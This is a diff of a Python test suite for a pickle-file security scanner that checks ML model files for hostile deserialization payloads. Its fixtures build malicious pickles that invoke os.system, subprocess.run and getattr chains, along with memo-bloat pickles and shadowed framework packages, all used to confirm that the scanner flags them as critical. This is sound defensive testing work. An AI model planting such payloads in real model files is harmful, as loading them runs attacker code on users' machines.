return bytes.fromhex("478727be61f70dbd70953cbd09b996bd5c7a2ebe") + (b"\x00" * 128) - - -def _yolov5n6_tensor_storage_prefix_bytes() -> bytes: - # First 64 bytes of Ultralytics/YOLOv5 yolov5n6.pt archive/data/195 at - # revision 5bca797074771ecdfd6267d6e9be32ee201d937b. - return bytes.fromhex( - "4dae5b2ed9a78527072fd82ac529db2d822f181d76258832bd2f39a63527ad2e" - "ba2d3eacd9247fb0a32b1525682aa0253831dc2c4c3085296c2cbcb1f52bea31" - ) - - -def _binary_magic_tensor_storage_bytes() -> bytes: - return b"\x80\x04\x00" + (b"\x00" * 129) - - def _writestr_preserving_member_name(archive: zipfile.ZipFile, member_name: str, data: bytes) -> None: info = zipfile.ZipInfo("placeholder") info.filename = member_name archive.writestr(info, data) -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - def _static_getattr_reduce_payload( *, builtin_module: bytes = b"__builtin__", @@ -570,10 +514,6 @@ def _static_getattr_reduce_payload( return payload + (b"." if stop else b"") -def _static_getattr_protocol0_unicode_payload() -> bytes: - return b"c__builtin__\ngetattr\ncultralytics.nn.modules.head\nDetect\nVforward\n\x86R." - - _TUPLE_MEMO_WRITES: tuple[tuple[str, bytes], ...] = ( ("PUT", b"p0\n"), ("BINPUT", b"q\x00"), @@ -672,12 +612,6 @@ def _static_getattr_with_stack_global_memo_operand_payload( return payload + _binunicode(b"forward") + b"\x86R." -def _clear_ultralytics_modules() -> None: - for module_name in tuple(sys.modules): - if module_name == "ultralytics" or module_name.startswith("ultralytics."): - sys.modules.pop(module_name, None) - - def _write_ultralytics_head_source( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, @@ -709,10 +643,6 @@ def _dangerous_getattr_findings(report: PickleReport) -> tuple[Finding, ...]: ) -def _binunicode8(data: bytes) -> bytes: - return b"\x8d" + len(data).to_bytes(8, "little") + data - - def _reference_global(module: str, name: str) -> bytes: return _global(module.encode("ascii"), name.encode("ascii")) @@ -772,264 +702,10 @@ def _hf_training_args_import_only_metadata_payload() -> bytes: _MALFORMED_NUMPY_RECONSTRUCT_PAYLOAD = b"cnumpy._core.multiarray\n_reconstruct\n(NtR." -def _force_framework_metadata_unresolved(monkeypatch: pytest.MonkeyPatch) -> None: - monkeypatch.setattr( - "modelaudit_picklescan.call_graph._trusted_module_origin_kind", - lambda _module_name: "unresolved", - ) - monkeypatch.setattr("modelaudit_picklescan.call_graph._resolve_module_source", lambda _module_name: None) - monkeypatch.setattr( - "modelaudit_picklescan.call_graph._find_module_spec_without_imports", - lambda _module_name: None, - ) - - _SHADOW_FRAMEWORK_MODULE = "transformers.training_args" _SHADOW_FRAMEWORK_NAME = "TrainingArguments" -def _stack_global_reference_payload(protocol: int) -> bytes: - return ( - bytes((0x80, protocol)) - + _short_binunicode(_SHADOW_FRAMEWORK_MODULE.encode("ascii")) - + b"\x94" - + _short_binunicode(_SHADOW_FRAMEWORK_NAME.encode("ascii")) - + b"\x94\x93" - ) - - -def _shadow_newobj_build_payload(protocol: int = 4) -> bytes: - return _stack_global_reference_payload(protocol) + b")\x81}b." - - -def _shadow_memo_alias_payload() -> bytes: - return _stack_global_reference_payload(4) + b"\x94" + b"0" + b"h\x02)\x81}b." - - -def _shadow_newobj_ex_payload() -> bytes: - return _stack_global_reference_payload(4) + b")}\x92}b." - - -def _shadow_slot_state_build_payload() -> bytes: - return ( - _stack_global_reference_payload(4) - + b")\x81N}" - + _short_binunicode(b"payload") - + _short_binunicode(b"owned") - + b"s\x86b." - ) - - -def _bytes_literal_payload(payload: bytes) -> bytes: - return b"\x80\x04B" + len(payload).to_bytes(4, "little") + payload + b"." - - -def _extension_reconstruction_payload(opcode: bytes, encoded_code: bytes) -> bytes: - return b"\x80\x04" + opcode + encoded_code + b")\x81}b." - - -def _shadow_framework_divergence_cases() -> tuple[object, ...]: - nested = _shadow_newobj_build_payload(4) - return ( - pytest.param("protocol4_stack_global", _shadow_newobj_build_payload(4), "single", None, id="protocol4"), - pytest.param("protocol5_stack_global", _shadow_newobj_build_payload(5), "single", None, id="protocol5"), - pytest.param("memo_alias", _shadow_memo_alias_payload(), "single", None, id="memo-alias"), - pytest.param("newobj_ex", _shadow_newobj_ex_payload(), "single", None, id="newobj-ex"), - pytest.param("slot_state_build", _shadow_slot_state_build_payload(), "single", None, id="slot-state-build"), - pytest.param("nested_stream", _bytes_literal_payload(nested), "nested", None, id="nested"), - pytest.param("concatenated_stream", b"\x80\x04N." + nested, "concatenated", None, id="concatenated"), - pytest.param("ext1_control", _extension_reconstruction_payload(b"\x82", b"\x01"), "single", 1, id="ext1"), - pytest.param( - "ext2_control", - _extension_reconstruction_payload(b"\x83", (256).to_bytes(2, "little")), - "single", - 256, - id="ext2", - ), - pytest.param( - "ext4_control", - _extension_reconstruction_payload(b"\x84", (70_000).to_bytes(4, "little")), - "single", - 70_000, - id="ext4", - ), - ) - - -def _write_shadow_transformers_package(package_root: Path, marker: Path) -> None: - package_dir = package_root / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "from pathlib import Path", - f"_MARKER = Path({str(marker)!r})", - "class TrainingArguments:", - " __slots__ = ('payload',)", - " def __new__(cls, *args, **kwargs):", - " return object.__new__(cls)", - " def __setstate__(self, state):", - " _MARKER.write_text('setstate', encoding='utf-8')", - " def __setattr__(self, name, value):", - " _MARKER.write_text(f'setattr:{name}', encoding='utf-8')", - " object.__setattr__(self, name, value)", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_init_inert_setstate_transformers_package(site_packages: Path, marker: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - f"MARKER = {str(marker)!r}", - "class TrainingArguments:", - " def __new__(cls, *args, **kwargs):", - " return object.__new__(cls)", - " def __setstate__(self, state):", - " with open(MARKER, 'w', encoding='utf-8') as handle:", - " handle.write('setstate')", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_import_side_effect_transformers_package(site_packages: Path, marker: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - f"MARKER = {str(marker)!r}", - "with open(MARKER, 'w', encoding='utf-8') as handle:", - " handle.write('import')", - "class OptimizerNames:", - " pass", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_rebindable_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "class TrainingArguments:", - " def __new__(cls):", - " return object.__new__(cls)", - "", - "class OptimizerNames:", - " def __new__(cls, value=''):", - " return object.__new__(cls)", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_init_heavy_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "HELPER = object()", - "class TrainingArguments:", - " def __new__(cls):", - " return object.__new__(cls)", - " def __init__(self):", - " self.helper = HELPER", - " def __setstate__(self, state):", - " self.__dict__.update(state)", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_enum_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "trainer_utils.py").write_text( - "\n".join( - [ - "from enum import Enum", - "class IntervalStrategy(str, Enum):", - " STEPS = 'steps'", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_rebindable_trusted_torch_utils_package(site_packages: Path) -> None: - package_dir = site_packages / "torch" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "_utils.py").write_text( - "\n".join( - [ - "def _rebuild_tensor(arg):", - " return None", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_cross_module_rebind_target_package(site_packages: Path) -> None: - (site_packages / "trusted_target.py").write_text( - "\n".join( - [ - "from pathlib import Path", - "def rebound_optimizer(path):", - " Path(path).write_text('cross-module', encoding='utf-8')", - " return None", - "", - ] - ), - encoding="utf-8", - ) - - -def _write_runtime_mutable_trusted_transformers_package(site_packages: Path) -> None: - package_dir = site_packages / "transformers" - package_dir.mkdir(parents=True, exist_ok=True) - (package_dir / "__init__.py").write_text("", encoding="utf-8") - (package_dir / "training_args.py").write_text( - "\n".join( - [ - "def OptimizerNames(value, callback=None):", - " if callback is not None:", - " return callback(value)", - " return None", - "", - ] - ), - encoding="utf-8", - ) - - def _write_same_module_rebind_trusted_transformers_package(site_packages: Path) -> None: package_dir = site_packages / "transformers" package_dir.mkdir(parents=True, exist_ok=True) @@ -1069,28 +745,6 @@ def _write_non_inert_trusted_transformers_package(site_packages: Path, marker: P ) -def _write_sitecustomize_trusting_site_packages(customize_dir: Path, site_packages: Path) -> None: - customize_dir.mkdir(parents=True, exist_ok=True) - (customize_dir / "sitecustomize.py").write_text( - "\n".join( - [ - "import sysconfig", - f"_TRUSTED_SITE_PACKAGES = {str(site_packages)!r}", - "_ORIGINAL_GET_PATH = sysconfig.get_path", - "def _patched_get_path(name, scheme=None, vars=None, expand=True):", - " if name in {'purelib', 'platlib'}:", - " return _TRUSTED_SITE_PACKAGES", - " if scheme is None and vars is None and expand is True:", - " return _ORIGINAL_GET_PATH(name)", - " return _ORIGINAL_GET_PATH(name, scheme=scheme, vars=vars, expand=expand)", - "sysconfig.get_path = _patched_get_path", - "", - ] - ), - encoding="utf-8", - ) - - def _preimport_rebound_subprocess_env(tmp_path: Path, site_packages: Path) -> dict[str, str]: customize_dir = tmp_path / "sitecustomize" _write_sitecustomize_trusting_site_packages(customize_dir, site_packages) @@ -1108,45 +762,6 @@ def _preimport_rebound_subprocess_env(tmp_path: Path, site_packages: Path) -> di return {**os.environ, "PYTHONPATH": pythonpath} -def _assert_shadow_framework_unpickle_executes( - payload_path: Path, - tmp_path: Path, - *, - mode: str, - extension_code: int | None, -) -> None: - marker = tmp_path / f"{payload_path.stem}.marker" - package_root = tmp_path / f"{payload_path.stem}.shadow" - _write_shadow_transformers_package(package_root, marker) - code_arg = "none" if extension_code is None else str(extension_code) - script = ( - "import copyreg, io, pickle, sys\n" - "from pathlib import Path\n" - "payload = Path(sys.argv[1]).read_bytes()\n" - "mode = sys.argv[2]\n" - "code_arg = sys.argv[3]\n" - "if code_arg != 'none':\n" - " copyreg.add_extension('transformers.training_args', 'TrainingArguments', int(code_arg))\n" - "if mode == 'nested':\n" - " pickle.loads(pickle.loads(payload))\n" - "elif mode == 'concatenated':\n" - " stream = io.BytesIO(payload)\n" - " while stream.tell() < len(payload):\n" - " pickle.load(stream)\n" - "else:\n" - " pickle.loads(payload)\n" - ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), mode, code_arg], - check=False, - env={**os.environ, "PYTHONPATH": str(package_root)}, - capture_output=True, - text=True, - ) - assert completed.returncode == 0, completed.stderr - assert marker.exists() - - def _import_reference_pairs(report: PickleReport) -> set[tuple[str, str]]: references = cast(tuple[collections.abc.Mapping[str, object], ...], report.metadata.get("import_references", ())) return {(str(reference.get("module", "")), str(reference.get("name", ""))) for reference in references} @@ -1418,122 +1033,94 @@ def test_scan_bytes_static_getattr_source_backed_method_sink_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "import os\n\nclass Detect:\n def forward(self):\n os.system('id')\n", + ("import os\n\nclass Detect:\n def forward(self):\n os.system('id')\n"), + ("sink-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="sink-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_decorated_method_descriptor_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "class Detect:\n @property\n def forward(self):\n return None\n", + ("class Detect:\n @property\n def forward(self):\n return None\n"), + ("decorated-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="decorated-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_module_initialization_side_effect_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: marker = tmp_path / "import-side-effect.txt" - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, f"open({str(marker)!r}, 'w').write('loaded')\n\nclass Detect:\n def forward(self):\n return None\n", + "module-init-static-getattr.pkl", ) - report = scan_bytes(_static_getattr_reduce_payload(), source="module-init-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_executable_class_body_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: marker = tmp_path / "class-body-side-effect.txt" - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "class Detect:\n" - f" open({str(marker)!r}, 'w').write('loaded')\n\n" - " def forward(self):\n" - " return None\n", + f"class Detect:\n open({str(marker)!r}, 'w').write('loaded')\n\n" + " def forward(self):\n return None\n", + "class-body-side-effect-static-getattr.pkl", ) - report = scan_bytes(_static_getattr_reduce_payload(), source="class-body-side-effect-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_class_namespace_write_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "def evil(self):\n" - " return None\n\n" - "class Detect:\n" - " def forward(self):\n" - " return None\n" - " locals()['forward'] = evil\n", + ( + "def evil(self):\n" + " return None\n\n" + "class Detect:\n" + " def forward(self):\n" + " return None\n" + " locals()['forward'] = evil\n" + ), + ("class-namespace-write-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="class-namespace-write-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_decorated_class_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "import os\n\n" - "def replace(_cls):\n" - " class Replacement:\n" - " def forward(self):\n" - " os.system('id')\n" - " return Replacement\n\n" - "@replace\n" - "class Detect:\n" - " def forward(self):\n" - " return None\n", + ( + "import os\n\n" + "def replace(_cls):\n" + " class Replacement:\n" + " def forward(self):\n" + " os.system('id')\n" + " return Replacement\n\n" + "@replace\n" + "class Detect:\n" + " def forward(self):\n" + " return None\n" + ), + ("decorated-class-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="decorated-class-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - @pytest.mark.parametrize( "source", @@ -1631,152 +1218,127 @@ def test_scan_bytes_static_getattr_class_body_rewrite_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "class Detect:\n def forward(self):\n return None\n forward = staticmethod(lambda self: None)\n", + ("class Detect:\n def forward(self):\n return None\n forward = staticmethod(lambda self: None)\n"), + ("class-body-rewritten-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="class-body-rewritten-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_conditional_class_body_method_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "import os\n\n" - "class Base:\n" - " def forward(self):\n" - " os.system('id')\n\n" - "class Detect(Base):\n" - " if False:\n" - " def forward(self):\n" - " return None\n", + ( + "import os\n\n" + "class Base:\n" + " def forward(self):\n" + " os.system('id')\n\n" + "class Detect(Base):\n" + " if False:\n" + " def forward(self):\n" + " return None\n" + ), + ("conditional-class-body-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="conditional-class-body-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_explicit_metaclass_lookup_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "class DetectMeta(type):\n" - " def __getattribute__(cls, name):\n" - " return super().__getattribute__(name)\n\n" - "class Detect(metaclass=DetectMeta):\n" - " def forward(self):\n" - " return None\n", + ( + "class DetectMeta(type):\n" + " def __getattribute__(cls, name):\n" + " return super().__getattribute__(name)\n\n" + "class Detect(metaclass=DetectMeta):\n" + " def forward(self):\n" + " return None\n" + ), + ("metaclass-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="metaclass-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_dynamic_metaclass_keyword_lookup_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "import os\n\n" - "class DetectMeta(type):\n" - " def __getattribute__(cls, name):\n" - " os.system('id')\n" - " return super().__getattribute__(name)\n\n" - "class Detect(**{'metaclass': DetectMeta}):\n" - " def forward(self):\n" - " return None\n", + ( + "import os\n\n" + "class DetectMeta(type):\n" + " def __getattribute__(cls, name):\n" + " os.system('id')\n" + " return super().__getattribute__(name)\n\n" + "class Detect(**{'metaclass': DetectMeta}):\n" + " def forward(self):\n" + " return None\n" + ), + ("dynamic-metaclass-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="dynamic-metaclass-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_dynamic_base_lookup_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "def make_base():\n" - " class Base:\n" - " pass\n" - " return Base\n\n" - "class Detect(make_base()):\n" - " def forward(self):\n" - " return None\n", + ( + "def make_base():\n" + " class Base:\n" + " pass\n" + " return Base\n\n" + "class Detect(make_base()):\n" + " def forward(self):\n" + " return None\n" + ), + ("dynamic-base-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="dynamic-base-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_unresolved_base_lookup_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "class Detect(ExternalBase):\n def forward(self):\n return None\n", + ("class Detect(ExternalBase):\n def forward(self):\n return None\n"), + ("unresolved-base-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="unresolved-base-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def test_scan_bytes_static_getattr_inherited_metaclass_lookup_stays_critical( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _write_ultralytics_head_source( + _assert_static_getattr_source_critical( tmp_path, monkeypatch, - "class DetectMeta(type):\n" - " def __getattribute__(cls, name):\n" - " return super().__getattribute__(name)\n\n" - "class Base(metaclass=DetectMeta):\n" - " pass\n\n" - "class Detect(Base):\n" - " def forward(self):\n" - " return None\n", + ( + "class DetectMeta(type):\n" + " def __getattribute__(cls, name):\n" + " return super().__getattribute__(name)\n\n" + "class Base(metaclass=DetectMeta):\n" + " pass\n\n" + "class Detect(Base):\n" + " def forward(self):\n" + " return None\n" + ), + ("inherited-metaclass-static-getattr.pkl"), ) - report = scan_bytes(_static_getattr_reduce_payload(), source="inherited-metaclass-static-getattr.pkl") - - findings = _dangerous_getattr_findings(report) - assert findings - assert all(finding.severity == Severity.CRITICAL for finding in findings) - def _file_mode_reduce_payload(module: bytes, name: bytes, target: Path, mode: bytes) -> bytes: return ( @@ -2002,57 +1564,17 @@ def _write_executing_pth(pth_path: Path, marker: Path, message: str) -> None: ) -def _make_pre_memoized_post_budget_stack_global_payload(tail: bytes) -> bytes: - payload = bytearray(b"\x80\x04") - payload += _short_binunicode(b"subprocess") + b"\x94" - payload += _short_binunicode(b"run") + b"\x94" - payload += b"\x880" * 4 - payload += tail - return bytes(payload) - - def _make_opcode_padding_stream(opcode_pairs: int) -> bytes: return b"\x80\x02" + (b"K\x010" * opcode_pairs) + b"." -def _make_memo_expansion_pickle(iterations: int, *, inert_writes: int = 0) -> bytes: - total_writes = iterations + inert_writes - if not 1 <= iterations <= 255 or total_writes > 255: - raise ValueError("iterations + inert_writes must fit in BINPUT/BINGET opcodes") - - payload = bytearray(b"\x80\x02)q\x000") - for memo_index in range(1, iterations + 1): - previous_index = memo_index - 1 - payload += b"h" + bytes([previous_index]) - payload += b"h" + bytes([previous_index]) - payload += b"\x86" - payload += b"q" + bytes([memo_index]) - payload += b"0" - for memo_index in range(iterations + 1, total_writes + 1): - payload += b"K\x01" - payload += b"q" + bytes([memo_index]) - payload += b"0" - payload += b"h" + bytes([iterations]) + b"." - return bytes(payload) - - -def _make_dup_heavy_pickle(iterations: int) -> bytes: - payload = bytearray(b"\x80\x02]q\x00") - for _ in range(iterations): - payload += b"h\x002a0" - payload += b"." - return bytes(payload) - - def _corrupt_first_byte(payload: bytes) -> bytes: corrupted = bytearray(payload) corrupted[0] ^= 0xFF return bytes(corrupted) -class MaliciousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo pwned",)) +MaliciousPayload = functools.partial(SystemCommandPayload, "echo pwned", lambda: os.system) class UnreadableStream(io.BytesIO): @@ -3285,16 +2807,10 @@ def test_scan_bytes_does_not_mark_synthetic_torch_storage_name_as_storage_persis def test_scan_bytes_flags_noncanonical_pytorch_storage_persistent_ids() -> None: - payload = b"\x80\x04(\x8c\x07storage\x94\x8c\x12torch.FloatStorage\x94\x8c\x04evil\x94\x8c\x03cpu\x94K\x01tQ." - - report = scan_bytes(payload, source="noncanonical-pytorch-storage.pkl") - - assert report.status == ScanStatus.COMPLETE - assert any( - finding.rule_code == "PERSISTENT_ID" and finding.details.get("opcode") == "BINPERSID" - for finding in report.findings + _assert_noncanonical_storage_reference( + b"\x80\x04(\x8c\x07storage\x94\x8c\x12torch.FloatStorage\x94\x8c\x04evil\x94\x8c\x03cpu\x94K\x01tQ.", + "noncanonical-pytorch-storage.pkl", ) - assert report.notices == () def test_scan_bytes_flags_deeply_nested_persistent_id_preview() -> None: @@ -3312,34 +2828,18 @@ def test_scan_bytes_flags_deeply_nested_persistent_id_preview() -> None: def test_scan_bytes_flags_pytorch_storage_persistent_ids_with_bool_size() -> None: - payload = ( - b"\x80\x04(\x8c\x07storage\x94\x8c\x05torch\x94\x8c\x0cFloatStorage\x94\x93\x8c\x01k\x94\x8c\x03cpu\x94\x88tQ." - ) - - report = scan_bytes(payload, source="bool-sized-pytorch-storage.pkl") - - assert report.status == ScanStatus.COMPLETE - assert any( - finding.rule_code == "PERSISTENT_ID" and finding.details.get("opcode") == "BINPERSID" - for finding in report.findings + _assert_noncanonical_storage_reference( + b"\x80\x04(\x8c\x07storage\x94\x8c\x05torch\x94\x8c\x0cFloatStorage\x94\x93\x8c\x01k\x94\x8c\x03cpu\x94\x88tQ.", + "bool-sized-pytorch-storage.pkl", ) - assert report.notices == () def test_scan_bytes_flags_pytorch_storage_persistent_ids_with_extra_fields() -> None: - payload = ( + _assert_noncanonical_storage_reference( b"\x80\x04(\x8c\x07storage\x94\x8c\x05torch\x94\x8c\x0cFloatStorage\x94\x93" - b"\x8c\x01k\x94\x8c\x03cpu\x94K\x01\x8c\x04evil\x94tQ." - ) - - report = scan_bytes(payload, source="extra-field-pytorch-storage.pkl") - - assert report.status == ScanStatus.COMPLETE - assert any( - finding.rule_code == "PERSISTENT_ID" and finding.details.get("opcode") == "BINPERSID" - for finding in report.findings + b"\x8c\x01k\x94\x8c\x03cpu\x94K\x01\x8c\x04evil\x94tQ.", + "extra-field-pytorch-storage.pkl", ) - assert report.notices == () def test_scan_bytes_attributes_reduce_calls_to_the_callable_operand_not_nested_args( @@ -4870,10 +4370,6 @@ def test_scan_file_preserves_hidden_malicious_storage_after_duplicate_state_key( "leading_plain_dict_storage_setitem", } - def encoded_key(value: str) -> bytes: - raw = value.encode("ascii") - return b"X" + len(raw).to_bytes(4, "little") + raw - tensor_value = ( _pytorch_rebuild_tensor_v2_payload( key="1" if separate_storage else "0", @@ -4883,20 +4379,20 @@ def encoded_key(value: str) -> bytes: .removeprefix(b"\x80\x04") .removesuffix(b".") ) - entries = [encoded_key("same") + tensor_value] - entries.extend(encoded_key(f"metadata_{index}") + b"K\x01" for index in range(40)) + entries = [_encoded_key("same") + tensor_value] + entries.extend(_encoded_key(f"metadata_{index}") + b"K\x01" for index in range(40)) suffix = b"u." if duplicate_variant == "ordered_batch": - entries.insert(1, encoded_key("same") + b"K\x00") + entries.insert(1, _encoded_key("same") + b"K\x00") elif duplicate_variant == "ordered_setitem": - suffix = b"u" + encoded_key("same") + b"K\x00s." + suffix = b"u" + _encoded_key("same") + b"K\x00s." elif duplicate_variant == "ordered_build": storage_reference = _pytorch_storage_binpersid_expr( key="0", storage_name="ByteStorage", element_count=len(hidden_payload), ) - suffix = b"u}(" + encoded_key("hidden") + storage_reference + b"ub." + suffix = b"u}(" + _encoded_key("hidden") + storage_reference + b"ub." elif duplicate_variant in {"list_reduce", "tuple_reduce", "ordered_reduce"}: storage_reference = _pytorch_storage_binpersid_expr( key="0", @@ -4910,7 +4406,7 @@ def encoded_key(value: str) -> bytes: "ordered_reduce": b"OrderedDict", }[duplicate_variant] suffix = ( - b"u" + encoded_key("converted") + _global(module_name, callable_name) + b"(" + storage_reference + b"tRs." + b"u" + _encoded_key("converted") + _global(module_name, callable_name) + b"(" + storage_reference + b"tRs." ) elif duplicate_variant in { "ordered_storage_key", @@ -4928,17 +4424,17 @@ def encoded_key(value: str) -> bytes: if duplicate_variant == "ordered_storage_key": suffix = b"u" + storage_reference + b"K\x00s." elif duplicate_variant == "ordered_storage_value": - suffix = b"u" + encoded_key("hidden") + storage_reference + b"s." + suffix = b"u" + _encoded_key("hidden") + storage_reference + b"s." elif duplicate_variant == "nested_storage_key": - suffix = b"u" + encoded_key("hidden") + b"}" + storage_reference + b"K\x00ss." + suffix = b"u" + _encoded_key("hidden") + b"}" + storage_reference + b"K\x00ss." else: storage_reference = _pytorch_storage_binpersid_expr( key="0", storage_name="ByteStorage", element_count=len(hidden_payload), ) - nested_dict = b"(" + encoded_key("slot") + storage_reference + encoded_key("slot") + b"K\x00d" - entries.append(encoded_key("nested") + nested_dict) + nested_dict = b"(" + _encoded_key("slot") + storage_reference + _encoded_key("slot") + b"K\x00d" + entries.append(_encoded_key("nested") + nested_dict) payload = b"\x80\x04" + _global(b"collections", b"OrderedDict") + b")R(" + b"".join(entries) + suffix if duplicate_variant == "leading_nested_ordered_storage": @@ -4946,16 +4442,16 @@ def encoded_key(value: str) -> bytes: payload = ( b"\x80\x04" + ordered_dict - + encoded_key("pre") + + _encoded_key("pre") + ordered_dict - + encoded_key("inside") + + _encoded_key("inside") + storage_reference + b"ss(" + b"".join(entries) + b"u." ) elif duplicate_variant in {"leading_plain_dict_storage_batch", "leading_plain_dict_storage_setitem"}: - hidden_entry = encoded_key("hidden") + storage_reference + hidden_entry = _encoded_key("hidden") + storage_reference initial_storage = b"(" + hidden_entry + b"u" if duplicate_variant.endswith("batch") else hidden_entry + b"s" payload = b"\x80\x04}" + initial_storage + b"(" + b"".join(entries) + b"u." with zipfile.ZipFile(archive_path, "w") as archive: @@ -5007,13 +4503,9 @@ def test_scan_file_preserves_hidden_malicious_storage_after_stack_discard( archive_path = tmp_path / f"malicious-stack-discard-{discard_variant}.pt" hidden_payload = b"S'" + b"A" * 5000 + b"'\n0cos\nsystem\n(S'echo discarded-storage'\ntR." - def encoded_key(value: str) -> bytes: - raw = value.encode("ascii") - return b"X" + len(raw).to_bytes(4, "little") + raw - tensor = _pytorch_rebuild_tensor_v2_payload(key="1").removeprefix(b"\x80\x04").removesuffix(b".") - entries = [encoded_key("weight") + tensor] - entries.extend(encoded_key(f"metadata_{index}") + b"K\x01" for index in range(40)) + entries = [_encoded_key("weight") + tensor] + entries.extend(_encoded_key(f"metadata_{index}") + b"K\x01" for index in range(40)) 